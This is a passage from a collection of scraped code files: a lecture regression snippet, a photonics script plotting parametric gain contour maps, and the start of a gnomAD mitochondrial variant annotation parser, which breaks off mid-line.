color='yellow')\n plt.plot(xp, pz5(xp), color='purple')\n plt.plot(xp, pz10(xp), color='orange')\n plt.show()\n\n print(adjR(employData, gnpdata, 1))\n print(adjR(employData, gnpdata, 2))\n print(adjR(employData, gnpdata, 3))\n print(adjR(employData, gnpdata, 4))\n print(adjR(employData, gnpdata, 5))\n print(adjR(employData, gnpdata, 10))\n\n norm_pz1 = np.linalg.norm(pz1)\n print(norm_pz1)\n\n newY = []\n newX = []\n for i in range(1, 10):\n newX.append(i)\n r = np.linalg.norm(employData, ord=i)\n print(r)\n newY.append(r)\n\n plt.scatter(newX, newY, c='red')\n 
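# Added note: newY[i] holds the order-(i+1) vector norm of the Employed column, so this scatter sketches how the norm grows with the order p.\r\n 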
plt.show()\n\n\n\n\n","repo_name":"dulda280/ML4Media","sub_path":"ML4MEDIA/lecture4.py","file_name":"lecture4.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43623588976","text":"import numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.interpolate import make_interp_spline, BSpline\r\nplt.style.use(['science','nature'])\r\n\r\nlevel0 = 16\r\nalpha0 = 1\r\ncmap1 = sns.color_palette(\"magma\", as_cmap=True)\r\ncmap2 = sns.color_palette(\"mako\", as_cmap=True)\r\n\r\n\r\nk = 0\r\neta = 1\r\nx_s = 0\r\n\r\nc = 3e10 # Speed of light in cm / s\r\ngamma = 2.4e-15 # cm/W\r\nng = 1.85 # Refractive index of Silicon at 1.55um. \r\nvg = c/ng # Group velocity\r\ntheta = 0.00144 # Assuming a set % of power is coupled to ring from bus \r\nLambda_rp = 1550e-7 # cm 1550 nm \r\nwr = 2 * np.pi * c / Lambda_rp # rad/s 1550 nm\r\nalpha_dB = 0.1\r\nRadius = 100e-4 # good choose for critical coupling \r\ntR = (2 * np.pi * Radius) / vg\r\ndndt = 2.5e-5\r\nAeff = 1.15e-8\r\ntau_th = 1.354e-6\r\ndelta_T = dndt*2*np.pi/(Lambda_rp)\r\ngamma = gamma*2*np.pi/Lambda_rp\r\npi = np.pi\r\n\r\ndef Linear_response(r1,alpha_dB1):\r\n alpha1 = np.log(10)/10*alpha_dB1\r\n return alpha1\r\ndef photonlifetime(r2,theta2,alpha_dB1):\r\n r2 = r2\r\n tR = (2 * np.pi * r2) / vg\r\n L = 2*np.pi*r2\r\n Loss = Linear_response(r2,alpha_dB1)*L + theta2\r\n return tR/Loss\r\n\r\nloss = Linear_response(Radius,alpha_dB)*2*np.pi*Radius\r\ntau_ph = photonlifetime(Radius,theta,alpha_dB)\r\nwarning = (8*theta*gamma*vg*(tau_ph**3))\r\nnormal_in = ((tR**2)/warning)**(0.5)\r\nnormal_T = 1/(2*delta_T*vg*tau_ph)\r\nnorma_f = (2*gamma*vg*tau_ph)**(-0.5)\r\n\r\nFSR = vg / (2 * pi * Radius) # Free Spectral range of the ring\r\nBeta_GVD = 0.00114362*(1e-24/1e2) # 0.00114362 #-0.1714\r\nEta_gvd = -c/ng*((2*pi*FSR)**2)*Beta_GVD\r\nnormal_t = np.sqrt(abs(Beta_GVD)*vg*tau_ph)\r\nS = 1e-3/(Aeff*(normal_in**2))\r\n\r\na1 = (1)\r\na0 = -S\r\np = [a1,a0]\r\nSolution = np.roots(p)\r\nsolution1 = np.array( [ num for num in Solution if np.angle(num) == 0 ])\r\nx = max(solution1)\r\nx = (x*(norma_f**2)*Aeff)*1e3\r\nS = (S*(normal_in**2)*Aeff)*1e3\r\nB = x/S\r\n\r\ndef solv_eq(delta, p):\r\n p1 = p\r\n p2 = p\r\n phase = (delta - ((2+x_s)*(p1+p2)))\r\n if np.sign(phase) == np.sign(eta):\r\n k = np.sqrt(abs(phase))\r\n else:\r\n k = 0 \r\n det = p1*p2 - ((phase - (eta*(k**2)))**2)\r\n if det < 0:\r\n gain = -1 \r\n else: \r\n gain = np.sqrt(det) - 1\r\n if gain < 0:\r\n gain = gain \r\n return gain\r\ndef solv_eq1(delta, p):\r\n p1 = p\r\n p2 = p\r\n phase = (delta - ((2+x_s)*(p1+p2)))\r\n if np.sign(phase) == np.sign(eta):\r\n k = np.sqrt(abs(phase))\r\n else:\r\n k = 0 \r\n det = p1*p2 - ((phase - (eta*(k**2)))**2)\r\n if det < 0:\r\n gain = 1 \r\n else:\r\n gain = np.sqrt(det) - 1\r\n if gain < 0:\r\n gain = 1 \r\n else: \r\n gain = \"NaN\"\r\n return gain\r\n\r\ndef solv_eq2(delta):\r\n if delta < 0:\r\n return \"NaN\"\r\n return delta/(2*(2+x_s))*(norma_f**2)*Aeff\r\n########################################################################\r\n\r\nk0 = 30*1e9*(2*np.pi)*2*tau_ph\r\nD = np.linspace(-1*k0, k0, 300)\r\npower = np.linspace(-1*k0, k0, 300)\r\np1 = 0 / ((norma_f**2)*Aeff)\r\np2 = (200e-3*B)/ ((norma_f**2)*Aeff)\r\nP = np.linspace(p1, p2, 300)\r\nZ0 = np.zeros((len(P),(len(D))))\r\nZ1= np.zeros((len(P),(len(D))))\r\nphase = np.zeros(len(D))\r\npower = np.zeros(len(D))\r\n\r\nphase1 = np.load(\"p00.npy\")\r\nphase2 = 
np.load(\"p01.npy\")\r\nphase3 = np.load(\"p02.npy\")\r\nphase4 = np.load(\"p03.npy\")\r\nphase5 = np.load(\"p10.npy\")\r\nphase6 = np.load(\"p11.npy\")\r\nphase7 = np.load(\"p12.npy\")\r\nphase8 = np.load(\"p13.npy\")\r\n\r\nthreshold1 = np.load(\"t00.npy\")\r\nthreshold2 = np.load(\"t01.npy\")\r\nthreshold3 = np.load(\"t02.npy\")\r\nthreshold4 = np.load(\"t03.npy\")\r\nthreshold5 = np.load(\"t10.npy\")\r\nthreshold6 = np.load(\"t11.npy\")\r\nthreshold7 = np.load(\"t12.npy\")\r\nthreshold8 = np.load(\"t13.npy\")\r\n\r\nfor i in range(0,len(P)):\r\n P[i] = P[i]*(norma_f**2)*Aeff/B*1e3\r\n \r\nfor i in range(0,len(D)):\r\n D[i] = (D[i]/(2*tau_ph))/(2*np.pi)/1e9\r\n \r\nX, Y = np.meshgrid(D, P)\r\n\r\nZ1 = np.load(\"g00.npy\")\r\nZ2 = np.load(\"g01.npy\")\r\nZ3 = np.load(\"g02.npy\")\r\nZ4 = np.load(\"g03.npy\")\r\nZ5 = np.load(\"g10.npy\")\r\nZ6 = np.load(\"g11.npy\")\r\nZ7 = np.load(\"g12.npy\")\r\nZ8 = np.load(\"g13.npy\")\r\n\r\nsma11= np.nanmin(Z1)\r\nsma12= np.nanmin(Z2)\r\nsma13= np.nanmin(Z3)\r\nsma14= np.nanmin(Z4)\r\nsmal1 = min(sma11,sma12,sma13,sma14)\r\n\r\n#lar11= np.nanmax(Z1)\r\n#lar12= np.nanmax(Z2)\r\n#lar13= np.nanmax(Z3)\r\n#lar14= np.nanmax(Z4)\r\n#larl1 = min(lar11,lar12,lar13,lar14)\r\n\r\nX, Y = np.meshgrid(D, P)\r\nl0 = 12\r\nfig, axes = plt.subplots(nrows=2, ncols=4,sharex='col', sharey='row' ,constrained_layout=True,figsize=(10, 5))\r\n# First column heatmaps with same colormap\r\n\r\npcm1 = axes[0, 0].contour(X, Y, Z1,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm1 = axes[0, 0].contourf(X, Y, Z1, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 0].plot(D,phase1,\"beige\",linestyle=\"dashed\")\r\naxes[0, 0].text(2.6, 100, r\" $\\bar\\Gamma = 0$\", color=\"beige\",fontsize=10)\r\naxes[0, 0].plot(D,threshold1,\"pink\",linestyle=\"dashed\")\r\naxes[0, 0].text(-15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 0].set_title(r'$\\alpha$ = 0.1 dB/cm without TOE', fontsize=12)\r\naxes[0, 0].axis(ymin=0,ymax=200)\r\n\r\npcm2 = axes[0, 1].contour(X, Y, Z2,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm2 = axes[0, 1].contourf(X, Y, Z2, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 1].plot(D,phase2,\"beige\",linestyle=\"dashed\")\r\naxes[0, 1].text(5.8, 100, r\" $\\bar\\Gamma = 0$\", color=\"beige\", fontsize=10)\r\naxes[0, 1].plot(D,threshold2,\"pink\",linestyle=\"dashed\")\r\naxes[0, 1].text(-15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 1].axis(ymin=0,ymax=200)\r\naxes[0, 1].set_title(r'$\\alpha$ = 0.1 dB/cm with TOE', fontsize=12)\r\n\r\nclb = fig.colorbar(pcm2, ax=axes[0,0:2], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\n \r\n# First column colorbar - slicing selects all rows, first column\r\n# Second column heatmaps with same colormap\r\npcm3 = axes[0, 2].contour(X, Y, Z3,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm3= axes[0, 2].contourf(X, Y, Z3, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 2].plot(D,phase3,\"beige\",linestyle=\"dashed\")\r\naxes[0, 2].text(-4.8, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\",fontsize=10)\r\naxes[0, 2].plot(D,threshold3,\"pink\",linestyle=\"dashed\")\r\naxes[0, 2].text(-15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 2].axis(ymin=0,ymax=200)\r\naxes[0, 2].set_title(r'$\\alpha$ = 0.3 dB/cm without TOE', fontsize=12)\r\n\r\npcm4= axes[0, 3].contour(X, Y, Z4, alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm4= axes[0, 3].contourf(X, Y, 
Z4, alpha=alpha0,cmap=cmap1,extend=\"both\",levels = 12)\r\naxes[0, 3].plot(D,phase4,\"beige\",linestyle=\"dashed\")\r\naxes[0, 3].text(-1.7, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[0, 3].plot(D,threshold4,\"pink\",linestyle=\"dashed\")\r\naxes[0, 3].text(-15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[0, 3].axis(ymin=0,ymax=200)\r\naxes[0, 3].set_title(r'$\\alpha$ = 0.3 dB/cm with TOE', fontsize=12)\r\n\r\nclb = fig.colorbar(pcm4, ax=axes[0, 3:5], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\n\r\n# Second column colorbar - slicing selects all rows, second column\r\n# Half the size of the first colorbar\r\npcm5 = axes[1, 0].contour(X, Y, Z5,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm5= axes[1, 0].contourf(X, Y, Z5,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 0].plot(D,phase5,\"beige\",linestyle=\"dashed\")\r\naxes[1, 0].text(17.5, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\",fontsize=10)\r\naxes[1, 0].plot(D,threshold5,\"pink\",linestyle=\"dashed\")\r\naxes[1, 0].text(15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 0].axis(ymin=0,ymax=200)\r\n\r\npcm6= axes[1,1].contour(X, Y, Z6,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm6= axes[1, 1].contourf(X, Y, Z6,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 1].plot(D,phase6,\"beige\",linestyle=\"dashed\")\r\naxes[1, 1].text(20.8, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[1, 1].plot(D,threshold6,\"pink\",linestyle=\"dashed\")\r\naxes[1, 1].text(15, 8, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 1].axis(ymin=0,ymax=200)\r\nclb = fig.colorbar(pcm6, ax=axes[1, 0:2], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\npcm7= axes[1,2].contour(X, Y, Z7,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm7= axes[1, 2].contourf(X, Y, Z7,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 2].plot(D,phase7,\"beige\",linestyle=\"dashed\")\r\naxes[1, 2].text(7, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[1, 2].plot(D,threshold7,\"pink\",linestyle=\"dashed\")\r\naxes[1, 2].text(15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 2].axis(ymin=0,ymax=200)\r\n\r\npcm8= axes[1,3].contour(X, Y, Z8,alpha=alpha0,colors=\"k\",linewidths= 0.4,levels = 12)\r\npcm8= axes[1, 3].contourf(X, Y, Z8,alpha=alpha0,cmap=cmap2,extend=\"both\",levels = 12)\r\naxes[1, 3].plot(D,phase8,\"beige\",linestyle=\"dashed\")\r\naxes[1, 3].text(10.3, 100, r\" $\\bar\\Gamma = 0$\",color=\"beige\", fontsize=10)\r\naxes[1, 3].plot(D,threshold8,\"pink\",linestyle=\"dashed\")\r\naxes[1, 3].text(15, 40, r\" $P_{th}$\", color=\"pink\", fontsize=10)\r\naxes[1, 3].axis(ymin=0,ymax=200)\r\nclb = fig.colorbar(pcm8, ax=axes[1, 3:5], fraction=0.046, pad=0.04)\r\nclb.ax.tick_params(labelsize=8)\r\nplt.tick_params(labelsize=8)\r\n\r\nfor ax in axes.flat:\r\n ax.tick_params(axis=\"x\", labelsize=11)\r\n ax.tick_params(axis=\"y\", labelsize=11)\r\n \r\n# Second column colorbar - slicing selects all rows, second column\r\n# Half the size of the first colorbar\r\n\r\nfig.supxlabel(r\"Pump detuning $\\Delta_{r}$ (GHz)\",fontsize=13)\r\nfig.supylabel(r\"Pump power $P_{i}$ (mW)\",fontsize=13)\r\n\r\n# clb.ax.tick_params(labelsize=8) \r\n# clb.ax.set_title(r\"Gain coefficient $g$\",fontsize=8)\r\n# cs11 = plt.contourf(X, Y, Z1,alpha=1,cmap=\"Blues\",levels = 2)\r\n# fig.supxlabel(r\"Red pump detuning 
$\\Delta_{r}$ (GHz)\",fontsize=9)\r\n# fig.supylabel(r\"Blue pump detuning $\\Delta_{b}$ (GHz)\",fontsize=9)\r\n# plt.title(r\"Parametric gain coefficient $g$\")\r\nplt.savefig(\"s4t1.png\",dpi=500,bbox_inches='tight')\r\nplt.show()\r\n# cs11 = plt.contour(X, Y, Z0,alpha=1,colors='white',levels = level0, linewidths= 0.3)\r\n# cs11 = plt.contourf(X, Y, Z0,alpha=1,cmap=\"PiYG\",extend=\"both\",levels = level0)\r\n# # plt.plot([1, 2, 3, 4], [1, 4, 9, 16], 'ro')\r\n# plt.plot(D,phase,\"beige\")\r\n# plt.text(7.3, 50, r\" $\\bar\\Gamma = 0$\", color=\"beige\", fontsize=level0)\r\n# plt.ylim((0,100))\r\n# # plt.clabel(cs1, colors = 'k', fmt = '%2.1f', fontsize=10)\r\n# clb = plt.colorbar()\r\n# # clb.ax.tick_params(labelsize=8) \r\n# clb.set_label(r\"Gain coefficient $g$\",fontsize=level0)\r\n# # cs11 = plt.contourf(X, Y, Z1,alpha=1,cmap=\"Blues\",levels = 2)\r\n# plt.xlabel(r\"Signal detuning $\\Delta_{s}$ (GHz)\",fontsize=level0)\r\n# plt.ylabel(r\"Intracavity power $P_{c}$ (W)\",fontsize=level0)\r\n# # plt.title(r\"Parametric gain coefficient $g$\")\r\n# np.save(\"glevel0.npy\",Z0)\r\n# plt.savefig(\"glevel0.png\",dpi=1000,bbox_inches='tight')\r\n# plt.show()","repo_name":"menglonghephd/Si3N4_DOPO","sub_path":"Gain.py","file_name":"Gain.py","file_ext":"py","file_size_in_byte":11102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74251093951","text":"#!/usr/bin/python\n\nimport argparse\nimport csv\nimport decimal\nimport gzip\nimport itertools\nimport json\nimport sys\nfrom typing import Dict, Tuple\n\n\ncsv.field_size_limit(sys.maxsize)\n\n\"\"\"gather additional annotations for gnomAD mitochondrial variants, not in VCF:\nMITOMAP: disease-associated variants, and database allele frequencies\nAPOGEE: in silico prediction for non-synonymous variants\nHmtVar: in silico prediction for tRNA variants\"\"\"\n\n\ndef in_mitomap(other_databases_path: str):\n \"\"\"Extract a disease-associated variant list, and GenBank allele frequencies from MITOMAP database.\n\n :param other_databases_path: path to the other_databases directory with required files\n :return: mitomap_counts and matches_disease dictionaries with relevant information\n \"\"\"\n mitomap_counts = {}\n matches_disease = {}\n\n with open(other_databases_path + \"MITOMAP_polymorphisms_02022021.cgi\") as csv_file:\n var_list = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n for row in var_list: # for each variant in mitomap\n # need to use allele counts (named \"gbcnt\") to convert to allele frequency, as if gbcnt = 1, gbfreq is written as 0.0 (rounded) in MITOMAP, total used for denominator n=51836\n mitomap_counts[str(row[\"pos\"]), str(row[\"ref\"]), str(row[\"alt\"])] = float(\n decimal.Decimal(row[\"gbcnt\"]) / 51836\n )\n\n with open(other_databases_path + \"MITOMAP_disease_02012021.cgi\") as csv_file:\n var_list = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n for row in var_list:\n if (\n str(row[\"pos\"]),\n str(row[\"ref\"]),\n str(row[\"alt\"]),\n ) not in mitomap_counts:\n mitomap_counts[\n str(row[\"pos\"]), str(row[\"ref\"]), str(row[\"alt\"])\n ] = float(decimal.Decimal(row[\"gbcnt\"]) / 51836)\n if (row[\"status\"] == \"Cfrm\") or (\n row[\"status\"] == \"Reported\"\n ): # gather disease-associated variants\n matches_disease[str(row[\"pos\"]), str(row[\"ref\"]), str(row[\"alt\"])] = (\n row[\"status\"],\n row[\"heteroplasmy\"],\n row[\"homoplasmy\"],\n row[\"disease\"],\n )\n\n return (mitomap_counts, matches_disease)\n\n\ndef apogee(insilicos_path: str):\n 
\"\"\"Extract APOGEE in silico predictions for non-synonymous variants.\n\n :param insilicos_path: path to the insilicos directory with required file\n :return: matches_apogee dictionary with APOGEE prediction for every variant\n \"\"\"\n with open(insilicos_path + \"MitImpact_db_3.0.6.txt\") as mitimpact:\n mitimpact = csv.DictReader(mitimpact, delimiter=\"\\t\")\n\n matches_apogee = {}\n\n for row in mitimpact:\n matches_apogee[\n (row[\"Start\"], row[\"Ref\"], row[\"Alt\"], row[\"Gene_symbol\"])\n ] = row[\"APOGEE\"]\n\n return matches_apogee\n\n\ndef hmtvar_annotations(insilicos_path: str):\n \"\"\"Extract HmtVar in silico predictions for tRNA variants, retrieved via API using get_hmtvar.py.\n\n :param insilicos_path: path to the insilicos directory with required file\n :return: matches_hmtvar dictionary with HmtVar prediction for every variant\n \"\"\"\n with open(insilicos_path + \"hmtvar_annotations.txt\") as hmtvar:\n hmtvar = csv.DictReader(hmtvar, delimiter=\"\\t\")\n\n matches_hmtvar = {}\n\n for row in hmtvar:\n insilico = \"\"\n # extract the in silico prediction from the annotation\n if len(row[\"HmtVar\"]) > 3:\n annotation = json.loads(row[\"HmtVar\"])\n insilico = str(annotation[\"pathogenicity\"])\n\n matches_hmtvar[(row[\"POS\"], row[\"REF\"], row[\"ALT\"])] = insilico\n\n return matches_hmtvar\n\n\n\"\"\"extract relevant data from gnomAD sample sheet and VCF:\nhaplogroup of each sample, heteroplasmy of each variant call, haplogroup associated with each variant call, allele frequencies and maximum heteroplasmy, and vep annotations\"\"\"\n\n\ndef samples(gnomAD_path: str):\n \"\"\"Create dictionary of sample ID and haplogroup.\n\n :param gnomAD_path: path to the gnomAD VCF\n :return: matches_samples dictionary with the haplogroup of every sample\n \"\"\"\n with open(gnomAD_path + \"t21/sample_annotations_gnomad.txt\") as csv_file:\n samples = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n matches_samples = {}\n\n for row in samples:\n matches_samples[row[\"s\"]] = row[\"hap\"]\n\n return matches_samples\n\n\ndef parse_vcf(matches_samples: Dict[str, str], gnomAD_path: str):\n \"\"\"VCF with genotype and heteroplasmy level data for each sample, not publicly available.\n\n :param matches_samples: dictionary generated by samples function\n :param gnomAD_path: path to the gnomAD VCF\n :return: matches_annotations, matches_insilico dictionaries linking relevant VCF annotations and in silicos predictions to each observed variant\n :return: matches_base, matches_codon dictionaries with maximum heteroplasmy observed at each base and codon\n \"\"\"\n with gzip.open(\n gnomAD_path + \"t21/sample_annotations_gnomad.vcf.bgz\", mode=\"rt\"\n ) as tsv_file:\n vcf = csv.reader(tsv_file, delimiter=\"\\t\")\n # vep annotations are per header\n header = \"Allele|Consequence|IMPACT|SYMBOL|Gene|Feature_type|Feature|BIOTYPE|EXON|INTRON|HGVSc|HGVSp|cDNA_position|CDS_position|Protein_position|Amino_acids|Codons|ALLELE_NUM|DISTANCE|STRAND|VARIANT_CLASS|MINIMISED|SYMBOL_SOURCE|HGNC_ID|CANONICAL|TSL|APPRIS|CCDS|ENSP|SWISSPROT|TREMBL|UNIPARC|GENE_PHENO|SIFT|PolyPhen|DOMAINS|HGVS_OFFSET|MOTIF_NAME|MOTIF_POS|HIGH_INF_POS|MOTIF_SCORE_CHANGE|LoF|LoF_filter|LoF_flags|LoF_info\"\n matches_annotations = (\n {}\n ) # extracting vep, allele frequencies, maximum heteroplasmy and other annotations from VCF\n matches_base = {} # this is the maximum heteroplasmy of a SNV at each base\n matches_codon = (\n {}\n ) # this is the maximum heteroplasmy of a non-synonymous SNV at each codon in protein-coding genes\n 
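# Added note: POS and max_hl are kept as the raw VCF strings here; the max-tracking comparisons below rely on their consistent decimal formatting.\n 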
matches_insilico = {} # extracting in silico annotations in VCF\n sample_ids = (\n {}\n ) # this is used to annotate the haplogroup of the individuals the variant is called in\n\n for row_index, row in enumerate(\n itertools.islice(vcf, 68, None)\n ): # row with header and sample IDs is 69 for t21\n all_het = [] # resets every row/variant\n haplos = []\n # this step extracts the heteroplasmy level of variant calls, and the haplogroup of the samples with the variant call\n if (row[6] == \"PASS\") or (row_index == 0): # pass only sites and header\n for col_index, cell in enumerate(\n itertools.islice(row, 9, None)\n ): # start from column 10, the first column with sample genotype data\n if row_index == 0: # ie if the first row (the header)\n sample_ids[\n col_index\n ] = cell # building a dictionary of the sample IDs\n else:\n genotype = cell.split(\":\")[0]\n if (genotype == \"0/1\") or (genotype == \"1/1\"):\n col_header = sample_ids[col_index] # sample\n haplogroup = matches_samples[\n col_header\n ] # haplogroup of sample\n haplos.append(haplogroup)\n heteroplasmy = cell.split(\":\")[2]\n all_het.append(heteroplasmy)\n\n if row[6] == \"PASS\":\n POS = row[1]\n REF = row[3]\n ALT = row[4]\n # will convert annotations in row[7] (column 8) to dictionary using = and ; separators\n # first need to handle annotations that don't have = separators\n # also handle the use of = in synonymous HVGSp (within vep field)\n if \"hap_defining_variant;\" in row[7]:\n row[7] = row[7].replace(\n \"hap_defining_variant;\", \"hap_defining_variant=yes;\"\n )\n else:\n row[7] = row[7] + \";hap_defining_variant=no\"\n if \"common_low_heteroplasmy;\" in row[7]:\n row[7] = row[7].replace(\n \"common_low_heteroplasmy;\", \"common_low_heteroplasmy=yes;\"\n )\n else:\n row[7] = row[7] + \";common_low_heteroplasmy=no\"\n if \"=|\" in row[7]: # synonymous variants\n row[7] = row[7].replace(\"=|\", \"|\")\n info = dict(\n (k.strip(), v.strip())\n for k, v in (item.split(\"=\") for item in row[7].split(\";\"))\n )\n max_hl = info[\"max_hl\"]\n VARIANT_CLASS = info[\"vep\"].split(\"|\")[20]\n SYMBOL = info[\"vep\"].split(\"|\")[3]\n BIOTYPE = info[\"vep\"].split(\"|\")[7]\n Consequence = info[\"vep\"].split(\"|\")[1]\n Protein_position = info[\"vep\"].split(\"|\")[14] # residue/codon\n HGVSc = info[\"vep\"].split(\"|\")[10]\n HGVSp = info[\"vep\"].split(\"|\")[11]\n\n max_hap_AF_hom = max_pop_AF_hom = 0.0 # reset each variant\n # maximum AF_hom per haplogroup, and per population\n for value in info[\"hap_AF_hom\"].split(\"|\"):\n if (value != \".\") and (float(value) >= float(max_hap_AF_hom)):\n max_hap_AF_hom = value\n for value in info[\"pop_AF_hom\"].split(\"|\"):\n if (value != \".\") and (float(value) >= float(max_pop_AF_hom)):\n max_pop_AF_hom = value\n\n matches_annotations[POS, REF, ALT, SYMBOL] = (\n max_hl,\n info[\"AN\"],\n info[\"AC_hom\"],\n info[\"AC_het\"],\n info[\"AF_hom\"],\n info[\"AF_het\"],\n info[\"faf_hapmax_hom\"],\n VARIANT_CLASS,\n SYMBOL,\n BIOTYPE,\n Consequence,\n Protein_position,\n HGVSc,\n HGVSp,\n all_het,\n haplos,\n max_hap_AF_hom,\n max_pop_AF_hom,\n )\n\n # for max heteroplasmy at base, SNVs only\n # for every SNV - if the base position of the variant is not in the matches_base dictionary,\n # or if the max_hl for the variant position in the dictionary is lower than the max_hl value for this variant (at the same position)\n # the variant's max_hl will be set as the maximum heteroplasmy for the base position\n if VARIANT_CLASS == \"SNV\":\n if (not POS in matches_base) or 
(matches_base[POS] < max_hl):\n matches_base[POS] = max_hl\n # for max heteroplasmy at codon, for SNVs in protein-coding genes only\n # for every non-synonymous SNV - if the codon (Protein_position) of the variant in the gene (SYMBOL) is not in the matches_codon dictionary,\n # or if the max_hl for the codon in the dictionary is lower than the max_hl value for this non-synonymous variant (at the same codon)\n # the variants's max_hl will be set as the maximum heteroplasmy for the codon\n if (\n (BIOTYPE == \"protein_coding\")\n and (VARIANT_CLASS == \"SNV\")\n and (Consequence != \"synonymous_variant\")\n ):\n if (not (SYMBOL, Protein_position) in matches_codon) or (\n matches_codon[(SYMBOL, Protein_position)] < max_hl\n ):\n matches_codon[(SYMBOL, Protein_position)] = max_hl\n # tRNA in silicos in VCF\n if (BIOTYPE == \"Mt_tRNA\") and (VARIANT_CLASS == \"SNV\"):\n if not (SYMBOL, POS, ALT) in matches_insilico:\n matches_insilico[(SYMBOL, POS, ALT)] = (\n info[\"mitotip_trna_prediction\"],\n info[\"pon_mt_trna_prediction\"],\n )\n\n if info[\"vep\"].count(\"|\") > header.count(\n \"|\"\n ): # then is two annotations, variant lies in two genes\n SYMBOL = info[\"vep\"].split(\"|\")[\n 48\n ] # plus 45, header.count('|') = 44\n BIOTYPE = info[\"vep\"].split(\"|\")[52]\n Consequence = info[\"vep\"].split(\"|\")[46]\n Protein_position = info[\"vep\"].split(\"|\")[59]\n HGVSc = info[\"vep\"].split(\"|\")[55]\n HGVSp = info[\"vep\"].split(\"|\")[56]\n\n # create a second entry for variants in two genes, with two consequences\n matches_annotations[POS, REF, ALT, SYMBOL] = (\n max_hl,\n info[\"AN\"],\n info[\"AC_hom\"],\n info[\"AC_het\"],\n info[\"AF_hom\"],\n info[\"AF_het\"],\n info[\"faf_hapmax_hom\"],\n VARIANT_CLASS,\n SYMBOL,\n BIOTYPE,\n Consequence,\n Protein_position,\n HGVSc,\n HGVSp,\n all_het,\n haplos,\n max_hap_AF_hom,\n max_pop_AF_hom,\n )\n\n # for max heteroplasmy at codon, for SNVs only\n # to catch variants where one consequence but not other is protein-changing\n if (\n (BIOTYPE == \"protein_coding\")\n and (VARIANT_CLASS == \"SNV\")\n and (Consequence != \"synonymous_variant\")\n ):\n if (not (SYMBOL, Protein_position) in matches_codon) or (\n matches_codon[(SYMBOL, Protein_position)] < max_hl\n ):\n matches_codon[(SYMBOL, Protein_position)] = max_hl\n\n # tRNA in silicos in VCF\n # to catch variants in two different tRNA genes\n if (BIOTYPE == \"Mt_tRNA\") and (VARIANT_CLASS == \"SNV\"):\n if not (SYMBOL, POS, ALT) in matches_insilico:\n matches_insilico[(SYMBOL, POS, ALT)] = (\n info[\"mitotip_trna_prediction\"],\n info[\"pon_mt_trna_prediction\"],\n )\n\n return (matches_annotations, matches_base, matches_codon, matches_insilico)\n\n\n\"\"\"now generate 'reformated.vcf', which is used to produce fig5, fig6, figS5d, figS7, figS8 and table S3\nthis includes the above gathered annotations from gnomAD VCF and other sources\"\"\"\n\n\ndef write_file_for_figures(\n matches_annotations: Dict[\n Tuple[str, str, str, str],\n Tuple[\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n list,\n list,\n str,\n str,\n ],\n ],\n matches_disease: Dict[Tuple[str, str, str], Tuple[str, str, str, str]],\n matches_base: Dict[str, str],\n matches_codon: Dict[Tuple[str, str], str],\n matches_insilico: Dict[Tuple[str, str, str], Tuple[str, str]],\n matches_apogee: Dict[Tuple[str, str, str, str], str],\n matches_hmtvar: Dict[Tuple[str, str, str], str],\n gnomAD_path: str,\n):\n \"\"\"Generate a VCF of all variants observed in gnomAD, with annotations 
that can be easily parsed for figure generation.\n\n :param matches_annotations: dictionary linking gnomAD variants to relevant VCF annotations, produced by parse_vcf function\n :param matches_disease: dictionary containing all reported disease-associated variants in MITOMAP, produced by in_mitomap function\n :params matches_insilico, matches_apogee, matches_hmtvar: dictionaries with in silicos predictions of each variant, produced by parse_vcf, apogee and hmtvar_annotations functions\n :params matches_base, matches_codon: dictionaries with maximum heteroplasmy observed at each base and codon in gnomAD, produced by parse_vcf function\n :param gnomAD_path: path to the gnomAD VCF\n \"\"\"\n with gzip.open(\n gnomAD_path + \"t21/sample_annotations_gnomad.vcf.bgz\", mode=\"rt\"\n ) as tsv_file:\n vcf = csv.reader(tsv_file, delimiter=\"\\t\")\n\n file = open(\"reformated.vcf\", 